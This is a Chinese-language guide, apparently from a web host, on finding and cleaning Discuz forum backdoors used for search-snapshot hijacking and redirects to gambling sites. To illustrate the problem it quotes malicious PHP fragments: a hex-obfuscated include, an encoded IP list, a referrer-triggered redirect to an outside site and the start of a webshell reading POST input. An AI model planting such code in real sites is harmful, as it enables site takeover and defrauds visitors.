西部数码反黑客硬干货

曲奇饼

00X0 网站被挂马 搜索引擎快照被劫持 网页被跳转

如果你的网站被劫持到一些非法站点上导致网站被标记为非法、赌博时，可能直接会被各种浏览器和搜索引擎标记为“恶意网站”从而直接拦截。世间最痛苦的事莫过于此，特么的被人阴了...

苦心经营网站多年，树立口碑不容易。一日被黑，日日被劫持。从此以后用户通过搜索引擎打开你的网站不是色情就是赌博。正常业务啥都没了，也别再谈什么可信度和口碑了。网站被收录与网站无关且违禁的博彩关键词，如果处理不及时，措施不当等待你的将是搜索引擎的惩罚：网站排名与权重下降，轻则不收录重则被k。

00X1 站长们苦恼的问题

网站被挂马该怎么解决？网站挂马的解决方法、网站被挂马怎么排查？网站老是被黑被挂马是什么原因？如何检测网站被挂马？网站快照被劫持怎么办？搜索引擎劫持怎么解决？百度快照被篡改劫持怎么回事？360快照被劫持怎么解决？discuz（DZ）被挂马快照被劫持的解决办法？dz论坛被挂马、快照劫持怎么防范？网页被跳转到博彩页面怎么办？诸如此类的问题不在罗列实在是太多了，下面就解决你的疑问！

00X2 挂马原理分析

快照劫持、搜索跳转其实是黑帽SEO利用站中站脚本自动繁殖文章“能熟练应用快照劫持(流量、爬虫、权重) 搜索跳转到自动繁殖文章（站中站脚本）做自己关键词获取定向流量的方法”

搜索引擎快照劫持是通过代码来判断和识别蜘蛛访问的，若正常访问，则给出正常内容，若判断到是搜素引擎来访问，就给出另一个页面，使搜素引擎抓取快照进行改变，之后判断来路跳转。

[快照劫持挂马方法] 多为下面两种方式实现其劫持功能

第一种：放在上html声明内引导劫持快照

这种劫持要比放在源码中更加高明难以发现，查看源码是看不到任何痕迹的。

第二种：利用字典文件繁殖文章使用include引用并提交给搜索引擎实施劫持

字典文件是一些关键词文件为文章生成提供资源，生成劫持静态文件放到要引用的文件中，根据SEO知识可知一般目录都不会太深，比较深的一般会有sitemap文件放在根目录引导蜘蛛爬取，平时注意下你的目录下sitemap.txt是否被篡改。

第一种是最简单粗暴的加到页面header文件里面引导蜘蛛。第二种相对更加隐蔽些，只需在Include中加上劫持目录即可。

Include引用代码：

@include($_SERVER[‘DOCUMENT_ROOT’].PACK('H*','2F646174612F737973646174612F30'));

【处理方法】解密代码：2F646174612F73797364614612F30 解蜜后为：/data/sysdata/0查看此目录找到并清理木马文件。

00X3 DZ论坛挂马常被反复篡改的文件

function_core.php、discuz_application.php、class_core.php、config_global.php注意排查。

一定有很多站长会遇到这个问题，不论怎么修改FTP密码，换服务器...class_core.php文件还是反复被挂马，class_core.php文件反复被挂马什么原因？一会是class_core.php被修改，一会是config_global.php被修改。那是因为木马后门已经扎根在你cms程序内部了，会时刻被唤醒使用。

class_core.php常被插入劫持<head>以上部分代码，就是第一种html声明劫持。查看源码看不到任何信息，只能抓取诊断。

为防恶意使用，仅贴出部分代码。

error_reporting(0);

$S9 = explode("|",_decode('NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg=='));

00X4 网站快照被劫持解决方法

1、进discuz后台找到工具-文件校验，找到最近被修改的php文件与源文件对比下。

2、dz的文件校验不会检查utility文件夹，除了upload里的文件，其他辅助功能文件一般用不到，如上传了请删除，避免被黑客利用。

3、使用后台文件校验看修改文件，UCcenter校验UC文件修改。

4、网站目录使用时间排序方式，查看最近修改的文件有没有可疑。

5、404态设置到位，可很大程度避免收录不存在的博彩劫持页面。

6、看网站目录内有没有被上传的tools目录或tools类型文件。

7、要有一查到底的决心，不然很难找到黑客埋藏的根基。

8、多方位加强防护，让劫持死于摇篮...

00X5 网站被劫持了怎么查看目录变化

站长们要学会从侧面发现快照劫持，不要仅仅在百度一个搜索引擎内site，要在多个搜索引擎内site，这样可以利用搜索引擎侧面检测反应网站快照劫持问题，只要有一个有劫持问题，就说明你网站一定被挂马了。并不是所有的搜索引擎都在同一时间内被劫持快照的，因为搜索引擎与搜索引擎算法技术的成熟程度是不一样的，还有就是你网站本身与搜索引擎爬虫友好度有关。

综上述解决快照劫持的大概步骤：校验文件-修改替换原始文件-设定404-举报/更新快照...

加强防范建议：插件不要随便使用，后门很多。

00X6 让你们见识下快照劫持字典文件、站中站脚本目录长什么样

快照劫持页面内容多为博彩、赌具、特服小姐等黄赌毒违法信息或其他办证，公关小姐类灰色外推行业关键词。

00X7 搜索引擎快照劫持扩展阅读

1、什么是搜索引擎快照劫持？

快照劫持：利用网站程序漏洞或爆破ftp，挂马篡改网页信息并主动post提交给搜索引擎，让其抓取收录，快照的内容多为博彩等推广内容。

2、搜索引擎快照劫持技术是什么？

搜索引擎劫持主要分快照劫持与跳转劫持，就是传说中的黑帽SEO手法快照劫持与流量劫持。其中快照劫持有的直接篡改原始网页挂马劫持，有的再生成新链接或上传大量静态页面挂黄赌毒博彩相关行业推广词；跳转劫持是使用跳转脚本让访问链接跳转到其他指定博彩站页面，主要是提高网站受众群体量与增加网站曝光度。

3、最新快照劫持及网页篡改网站入侵挂马问题

class_core.php文件插入跳转代码

1. <div align="left"><span style="font-size: 16px;">error_reporting(E_ALL);</span></div><div align="left"><span style="font-size: 16px;">@error_reporting(1);</span></div><div align="left"><span style="font-size: 16px;">@$ref = strtolower($_SERVER['HTTP_REFERER']);</span></div><div align="left"><span style="font-size: 16px;">@$jump_ref = explode("|","haoso.|so.|haosou.|google.|soso.");</span></div><div align="left"><span style="font-size: 16px;">foreach($jump_ref as $r){</span></div><div align="left"><span style="font-size: 16px;">$r = trim($r);</span></div><div align="left"><span style="font-size: 16px;">if(stristr($ref,$r)){</span></div><div align="left"><span style="font-size: 16px;">if($_GET['tid']>50000){</span></div><div align="left"><span style="font-size: 16px;">header('Location: [url]http://www.xxxxxxxxx.com/?op5u'[/url]);</span></div><div align="left"><span style="font-size: 16px;">die();</span></div><div align="left"><span style="font-size: 16px;">}</span></div><div align="left"><span style="font-size: 16px;">}</span></div><div align="left"><span style="font-size: 16px;">}</span></div>

复制代码

1. <div align="left"><span style="font-size: 16px;"><?php</span></div><div align="left"><span style="font-size: 16px;">error_reporting(0);set_time_limit(0);</span></div><div align="left"><span style="font-size: 16px;">$GuTou=@$_POST["gutou"];</span></div><div align="left"><span style="font-size: 16px;">if($GuTou){</span></div><div align="left"><span style="font-size: 16px;">$cc="";for($i=0;$i<strlen($GuTou);$i+=2)</span></div><div align="left"><span style="font-size: 16px;">$cc.=urldecode("%".substr($GuTou,$i,2));</span></div><div align="left"><span style="font-size: 16px;">}</span></div><div align="left"><span style="font-size: 16px;">?></span></div>

复制代码